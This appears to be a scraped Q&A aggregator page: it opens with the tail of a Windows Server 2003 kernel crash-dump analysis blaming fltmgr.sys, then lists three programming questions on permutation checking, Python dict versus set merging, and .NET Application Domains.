Defaulted to export symbols for fltmgr.sys - --omitted-- Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) Followup: MachineOwner --------- ----- 32 bit Kernel Full Dump Analysis DUMP_HEADER32: MajorVersion 0000000f MinorVersion 00000ece KdSecondaryVersion 00000000 DirectoryTableBase 004e7000 PfnDataBase 81600000 PsLoadedModuleList 8089ffa8 PsActiveProcessHead 808a61c8 MachineImageType 0000014c NumberProcessors 00000001 BugCheckCode 0000007e BugCheckParameter1 c0000005 BugCheckParameter2 f723e087 BugCheckParameter3 f78dea8c BugCheckParameter4 f78de788 PaeEnabled 00000001 KdDebuggerDataBlock 8088e3e0 SecondaryDataState 00000000 ProductType 00000003 SuiteMask 00000110 Physical Memory Description: Number of runs: 3 (limited to 3) FileOffset Start Address Length 00001000 0000000000001000 0009e000 0009f000 0000000000100000 bfdf0000 bfe8f000 00000000bff00000 00100000 Last Page: 00000000bff8e000 00000000bffff000 KiProcessorBlock at 8089f300 1 KiProcessorBlock entries: ffdff120 Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible Product: Server, suite: TerminalServer SingleUserTS Built by: 3790.srv03_sp2_gdr.101019-0340 Machine Name:*** ERROR: Module load completed but symbols could not be loaded for srv.sys Kernel base = 0x80800000 PsLoadedModuleList = 0x8089ffa8 Debug session time: Wed Oct 5 08:48:04.803 2011 (UTC - 4:00) System Uptime: 0 days 14:25:12.085 start end module name 80800000 80a50000 nt Tue Oct 19 10:00:49 2010 (4CBDA491) 80a50000 80a6f000 hal Sat Feb 17 00:48:25 2007 (45D69729) b83d4000 b83fe000 Fastfat Sat Feb 17 01:27:55 2007 (45D6A06B) b8476000 b84a1000 RDPWD Sat Feb 17 00:44:38 2007 (45D69646) b8549000 b8554000 TDTCP Sat Feb 17 00:44:32 2007 (45D69640) b8fe1000 b9045000 srv Thu Feb 17 11:58:17 2011 (4D5D53A9) b956d000 b95be000 HTTP Fri Nov 06 07:51:22 2009 (4AF41BCA) b9816000 b982d780 hgfs Tue Aug 12 20:36:54 2008 (48A22CA6) b9b16000 b9b20000 ndisuio Sat Feb 17 00:58:25 2007 (45D69981) b9cf6000 b9d1ac60 iwfsd Wed Sep 29 01:43:59 2004 (415A4B9F) b9e5b000 b9e62000 parvdm Tue Mar 25 03:03:49 2003 (3E7FFF55) b9e63000 b9e67860 lgtosync Fri Sep 12 04:38:13 2003 (3F6185F5) b9ed3000 b9ee8000 Cdfs Sat Feb 17 01:27:08 2007 (45D6A03C) b9f10000 b9f2e000 EraserUtilRebootDrv Thu Jul 07 21:45:11 2011 (4E166127) b9f2e000 b9f8c000 eeCtrl Thu Jul 07 21:45:11 2011 (4E166127) b9f8c000 b9f9d000 Fips Sat Feb 17 01:26:33 2007 (45D6A019) b9f9d000 ba013000 mrxsmb Fri Feb 18 10:22:23 2011 (4D5E8EAF) ba013000 ba043000 rdbss Wed Feb 24 10:54:03 2010 (4B854B9B) ba043000 ba0ad000 SPBBCDrv Mon Dec 14 23:39:00 2009 (4B2712E4) ba0ad000 ba0d7000 afd Thu Feb 10 08:42:18 2011 (4D53EB3A) ba0d7000 ba108000 netbt Sat Feb 17 01:28:57 2007 (45D6A0A9) ba108000 ba19c000 tcpip Sat Aug 15 05:53:38 2009 (4A8685A2) ba19c000 ba1b5000 ipsec Sat Feb 17 01:29:28 2007 (45D6A0C8) ba275000 ba288600 NAVENG Fri Jul 29 08:10:02 2011 (4E32A31A) ba289000 ba2ae000 SYMEVENT Thu Apr 15 21:31:23 2010 (4BC7BDEB) ba2ae000 ba42d300 NAVEX15 Fri Jul 29 08:07:28 2011 (4E32A280) ba42e000 ba479000 SRTSP Fri Mar 04 15:31:08 2011 (4D714C0C) ba485000 ba487b00 dump_vmscsi Wed Apr 11 13:55:32 2007 (461D2114) ba4e1000 ba540000 update Mon May 28 08:15:16 2007 (465AC7D4) ba568000 ba59f000 rdpdr Sat Feb 17 00:51:00 2007 (45D697C4) ba59f000 ba5b1000 raspptp Sat Feb 17 01:29:20 2007 (45D6A0C0) ba5b1000 ba5ca000 ndiswan Sat Feb 17 01:29:22 2007 (45D6A0C2) ba5da000 ba5e4000 dump_diskdump Sat Feb 17 01:07:44 2007 (45D69BB0) ba66a000 ba67e000 rasl2tp Sat Feb 17 01:29:02 2007 (45D6A0AE) ba67e000 ba69a000 VIDEOPRT Sat Feb 17 
01:10:30 2007 (45D69C56) ba69a000 ba6c1000 ks Sat Feb 17 01:30:40 2007 (45D6A110) ba6c1000 ba6d5000 redbook Sat Feb 17 01:07:26 2007 (45D69B9E) ba6d5000 ba6ea000 cdrom Sat Feb 17 01:07:48 2007 (45D69BB4) ba6ea000 ba6ff000 serial Sat Feb 17 01:06:46 2007 (45D69B76) ba6ff000 ba717000 parport Sat Feb 17 01:06:42 2007 (45D69B72) ba717000 ba72a000 i8042prt Sat Feb 17 01:30:40 2007 (45D6A110) baff0000 baff3700 CmBatt Sat Feb 17 00:58:51 2007 (45D6999B) bf800000 bf9d3000 win32k Thu Mar 03 08:55:02 2011 (4D6F9DB6) bf9d3000 bf9ea000 dxg Sat Feb 17 01:14:39 2007 (45D69D4F) bf9ea000 bf9fec80 vmx_fb Sat Aug 16 07:23:10 2008 (48A6B89E) bf9ff000 bfa4a000 ATMFD Tue Feb 15 08:19:22 2011 (4D5A7D5A) bff60000 bff7e000 RDPDD Sat Feb 17 09:01:19 2007 (45D70AAF) f7214000 f723a000 KSecDD Mon Jun 15 13:45:11 2009 (4A3688A7) f723a000 f725f000 fltmgr Sat Feb 17 00:51:08 2007 (45D697CC) f725f000 f7272000 CLASSPNP Sat Feb 17 01:28:16 2007 (45D6A080) f7272000 f7283000 symmpi Mon Dec 13 16:03:14 2004 (41BE0392) f7283000 f72a2000 SCSIPORT Sat Feb 17 01:28:41 2007 (45D6A099) f72a2000 f72bf000 atapi Sat Feb 17 01:07:34 2007 (45D69BA6) f72bf000 f72e9000 volsnap Sat Feb 17 01:08:23 2007 (45D69BD7) f72e9000 f7315000 dmio Sat Feb 17 01:10:44 2007 (45D69C64) f7315000 f733c000 ftdisk Sat Feb 17 01:08:05 2007 (45D69BC5) f733c000 f7352000 pci Sat Feb 17 00:59:03 2007 (45D699A7) f7352000 f7386000 ACPI Sat Feb 17 00:58:47 2007 (45D69997) f7487000 f7490000 WMILIB Tue Mar 25 03:13:00 2003 (3E80017C) f7497000 f74a6000 isapnp Sat Feb 17 00:58:57 2007 (45D699A1) f74a7000 f74b4000 PCIIDEX Sat Feb 17 01:07:32 2007 (45D69BA4) f74b7000 f74c7000 MountMgr Sat Feb 17 01:05:35 2007 (45D69B2F) f74c7000 f74d2000 PartMgr Sat Feb 17 01:29:25 2007 (45D6A0C5) f74d7000 f74e7000 disk Sat Feb 17 01:07:51 2007 (45D69BB7) f74e7000 f74f3000 Dfs Sat Feb 17 00:51:17 2007 (45D697D5) f74f7000 f7501000 crcdisk Sat Feb 17 01:09:50 2007 (45D69C2E) f7507000 f7517000 agp440 Sat Feb 17 00:58:53 2007 (45D6999D) f7517000 f7522000 TDI Sat Feb 17 01:01:19 2007 (45D69A2F) f7527000 f7532000 ptilink Sat Feb 17 01:06:38 2007 (45D69B6E) f7537000 f7540000 raspti Sat Feb 17 00:59:23 2007 (45D699BB) f7547000 f7556000 termdd Sat Feb 17 00:44:32 2007 (45D69640) f7557000 f7561000 Dxapi Tue Mar 25 03:06:01 2003 (3E7FFFD9) f7577000 f7580000 mssmbios Sat Feb 17 00:59:12 2007 (45D699B0) f7587000 f7595000 NDProxy Wed Nov 03 09:25:59 2010 (4CD162E7) f75a7000 f75b1000 flpydisk Tue Mar 25 03:04:32 2003 (3E7FFF80) f75b7000 f75c0080 SRTSPX Fri Mar 04 15:31:24 2011 (4D714C1C) f75d7000 f75e3000 vga Sat Feb 17 01:10:30 2007 (45D69C56) f75e7000 f75f2000 Msfs Sat Feb 17 00:50:33 2007 (45D697A9) f75f7000 f7604000 Npfs Sat Feb 17 00:50:36 2007 (45D697AC) f7607000 f7615000 msgpc Sat Feb 17 00:58:37 2007 (45D6998D) f7617000 f7624000 netbios Sat Feb 17 00:58:29 2007 (45D69985) f7627000 f7634000 wanarp Sat Feb 17 00:59:17 2007 (45D699B5) f7637000 f7646000 intelppm Sat Feb 17 00:48:30 2007 (45D6972E) f7647000 f7652000 kbdclass Sat Feb 17 01:05:39 2007 (45D69B33) f7657000 f7661000 mouclass Tue Mar 25 03:03:09 2003 (3E7FFF2D) f7667000 f7671000 serenum Sat Feb 17 01:06:44 2007 (45D69B74) f7677000 f7682000 fdc Sat Feb 17 01:07:16 2007 (45D69B94) f7687000 f7694b00 vmx_svga Sat Aug 16 07:22:07 2008 (48A6B85F) f7697000 f76a0000 watchdog Sat Feb 17 01:11:45 2007 (45D69CA1) f76a7000 f76b0000 ndistapi Sat Feb 17 00:59:19 2007 (45D699B7) f76b7000 f76c6000 raspppoe Sat Feb 17 00:59:23 2007 (45D699BB) f76c8000 f7707000 NDIS Sat Feb 17 01:28:49 2007 (45D6A0A1) f7707000 f770f000 kdcom Tue Mar 25 03:08:00 2003 
(3E800050) f770f000 f7717000 BOOTVID Tue Mar 25 03:07:58 2003 (3E80004E) f7717000 f771e000 intelide Sat Feb 17 01:07:32 2007 (45D69BA4) f771f000 f7726000 dmload Tue Mar 25 03:08:08 2003 (3E800058) f777f000 f7786000 dxgthk Tue Mar 25 03:05:52 2003 (3E7FFFD0) f7787000 f778e000 vmmemctl Tue Aug 12 20:37:25 2008 (48A22CC5) f77cf000 f77d6280 vmxnet Mon Sep 08 21:17:10 2008 (48C5CE96) f77d7000 f77df000 audstub Tue Mar 25 03:09:12 2003 (3E800098) f77ef000 f77f7000 Fs_Rec Tue Mar 25 03:08:36 2003 (3E800074) f77f7000 f77fe000 Null Tue Mar 25 03:03:05 2003 (3E7FFF29) f77ff000 f7806000 Beep Tue Mar 25 03:03:04 2003 (3E7FFF28) f7807000 f780f000 mnmdd Tue Mar 25 03:07:53 2003 (3E800049) f780f000 f7817000 RDPCDD Tue Mar 25 03:03:05 2003 (3E7FFF29) f7817000 f781f000 rasacd Tue Mar 25 03:11:50 2003 (3E800136) f7878000 f7897000 Mup Tue Apr 12 15:05:46 2011 (4DA4A28A) f7897000 f7899980 compbatt Sat Feb 17 00:58:51 2007 (45D6999B) f789b000 f789e900 BATTC Sat Feb 17 00:58:46 2007 (45D69996) f789f000 f78a1b00 vmscsi Wed Apr 11 13:55:32 2007 (461D2114) f79af000 f79b0280 vmmouse Mon Aug 11 07:16:51 2008 (48A01FA3) f79b1000 f79b2280 swenum Sat Feb 17 01:05:56 2007 (45D69B44) f7b4a000 f7bdf000 Ntfs Sat Feb 17 01:27:23 2007 (45D6A04B) Unloaded modules: ba65a000 ba668000 imapi.sys Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 0000E000 ba1c4000 ba1d5000 vpc-8042.sys Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 00011000 f77df000 f77e7000 Sfloppy.SYS Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 00008000 ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 7E, {c0000005, f723e087, f78dea8c, f78de788} ***** Kernel symbols are WRONG. Please fix symbols to do analysis. --omitted-- Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) Followup: MachineOwner --------- Finished dump check


  • Algorithm: How to tell if an array is a permutation in O(n)?

    - by Iulian Serbanoiu
    Hello. Input: a read-only array of N elements containing integer values from 1 to N, and a memory zone of a fixed size (10, 100, 1000 etc., not depending on N). How can I tell in O(n) whether the array represents a permutation?
    What I have achieved so far: I use the limited memory area to store the sum and the product of the array. I compare (1) the sum with N*(N+1)/2 and (2) the product with N!. I know that if condition (2) is true I might have a permutation. I'm wondering if there's a way to prove that condition (2) is sufficient to tell whether I have a permutation. So far I haven't figured this out... Thanks, Iulian


  • what's faster: merging lists or dicts in python?

    - by tipu
    I'm working with an app that is CPU-bound more than memory-bound, and I'm trying to merge two things, whether they be sets or dicts. Now, the thing is I can choose either one, but I'm wondering if merging dicts would be faster since it's all in memory? Or is it always going to be O(n), n being the size of the smaller set? The reason I asked about dicts rather than sets is that I can't convert a set to JSON: that results in {key1, key2, key3}, and JSON needs key/value pairs, so I am using a dict so that json.dumps returns {key1:1, key2:1, key3:1}. Yes, this is wasteful, but if it proves to be faster then I'm okay with it.


  • I don't understand Application Domains

    - by Jeremy Edwards
    .NET has this concept of Application Domains which, from what I understand, can be used to load an assembly into memory. I've done some research on Application Domains as well as gone to my local book store for some additional knowledge on this subject matter, but it seems very scarce. All I know I can do with Application Domains is load assemblies into memory, and I can unload them when I want. What capabilities do Application Domains have other than the ones I have mentioned? Do threads respect Application Domain boundaries? Are there any drawbacks to loading assemblies in Application Domains other than the main Application Domain, beyond the performance of cross-domain communication? Links to resources that discuss Application Domains would be nice as well. I've already checked out MSDN, which doesn't have that much information about them.

